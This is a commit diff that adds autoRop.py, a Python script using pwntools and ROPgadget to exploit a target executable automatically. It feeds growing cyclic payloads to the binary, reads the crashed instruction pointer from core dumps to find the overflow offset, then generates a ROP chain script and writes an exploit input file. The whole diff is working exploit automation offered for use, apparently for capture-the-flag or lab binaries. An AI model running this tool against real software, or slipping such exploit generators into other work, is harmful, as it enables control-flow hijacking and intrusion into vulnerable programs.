Clean up find_offset and add payload args

autoRop.py

@@ -0,0 +1,100 @@
+import argparse
+import atexit
+import math
+import os
+import subprocess
+import sys
+from contextlib import redirect_stderr
+
+from pwnlib.context import context
+from pwnlib.elf.corefile import Coredump
+from pwnlib.tubes.process import process, signal
+from pwnlib.util.cyclic import cyclic, cyclic_find
+from pwnlib.util.packing import pack
+from pwnlib import atexit as pwnlibexit
+
+# pwnlib has its own version of atexit to do stuff when the program exits, but uses sys.exitfunc
+# to do so... unfortunately this was deprecated in python3 so it no longer works!
+# either we use python2 or just re-register the pwnlib functions as follows
+# why does everything use python2 :(
+atexit.register(pwnlibexit._run_handlers)
+
+# delete the corefiles on exit
+context.update(delete_corefiles=True)
+
+print(r'''
+   _                ___       _.--.  ___        _____          ______ _____          ______ ______ 
+\`.|\..----...-'`   `-._.-'_.-'`    / _ \      / ____|   /\   |____  / ____|   /\   |  ____|  ____|
+/  ' `         ,       __.--'      | | | |_  _| |       /  \      / / |       /  \  | |__  | |__   
+)/' _/     \   `-_,   /            | | | \ \/ / |      / /\ \    / /| |      / /\ \ |  __| |  __|
+`-'" `"\_  ,_.-;_.-\_ ',           | |_| |>  <| |____ / ____ \  / / | |____ / ____ \| |    | |____ 
+    _.-'_./   {_.'   ; /            \___//_/\_\\_____/_/    \_\/_/   \_____/_/    \_\_|    |______|
+   {_.-``-'         {_/
+''')
+
+arg_parser = argparse.ArgumentParser(description="Run an automated ROP on an executable")
+arg_parser.add_argument("exec_file", metavar="exec_file", type=str, help="The executable file to exploit")
+arg_parser.add_argument("rop_file", metavar="rop_file", type=str, help="The name of the generated ROP input file")
+arg_parser.add_argument("--min_payload", metavar="min", default=32, type=int, help="The minimum payload length to try")
+arg_parser.add_argument("--max_payload", metavar="max", default=16384, type=int, help="The maximum payload length to try")
+args = arg_parser.parse_args()
+
+exec_file = args.exec_file
+rop_file = args.rop_file
+min_payload = args.min_payload
+max_payload = args.max_payload
+
+def find_offset(exec_file: str, min_payload: int, max_payload: int):
+    input_file = "input.txt"
+
+    payload_size = min_payload
+    while payload_size <= max_payload:
+        
+        print(f"[🤔] Trying payload {payload_size}...")
+
+        with open(input_file, "wb") as f:
+            payload = cyclic(payload_size)
+            f.write(payload)
+
+        proc = process([f"./{exec_file}", input_file])
+        exit_code = proc.poll(block=True)
+
+        if exit_code != 0:
+            # ignore the warnings returned by pwnlib, if finding corefile fails then core is None
+            with open("/dev/null", "w") as f, redirect_stderr(f):
+                core = proc.corefile
+
+            if core is not None and pack(core.eip) in payload:
+                offset = cyclic_find(core.eip)
+                print(f"[😳] Found offset at {offset}!\n")
+                return offset
+
+        payload_size *= 2
+
+    return -1
+
+offset = find_offset(exec_file, min_payload, max_payload)
+
+if offset == -1:
+    print(f"[😞] Failed to find offset. Try increasing the payload bounds and ensuring core dumps are enabled!")
+    sys.exit(0)
+
+print(f"[🤔] Running ROPgadget with offset {offset}...")
+result = subprocess.run(
+    [
+        "ROPgadget",
+        "--binary", exec_file,
+        "--ropchain",
+        "--silent",
+        "--paddingLen", str(offset)
+    ], 
+    stdout = subprocess.PIPE
+)
+
+with open("script.py", "wb") as f:
+    f.write(result.stdout)
+
+print(f"[🤔] Running generated script to create ROP input file...")
+process(["python3", "script.py", rop_file]).wait()
+
+print(f"[🤩] All done! The ROP input is saved to {rop_file}!")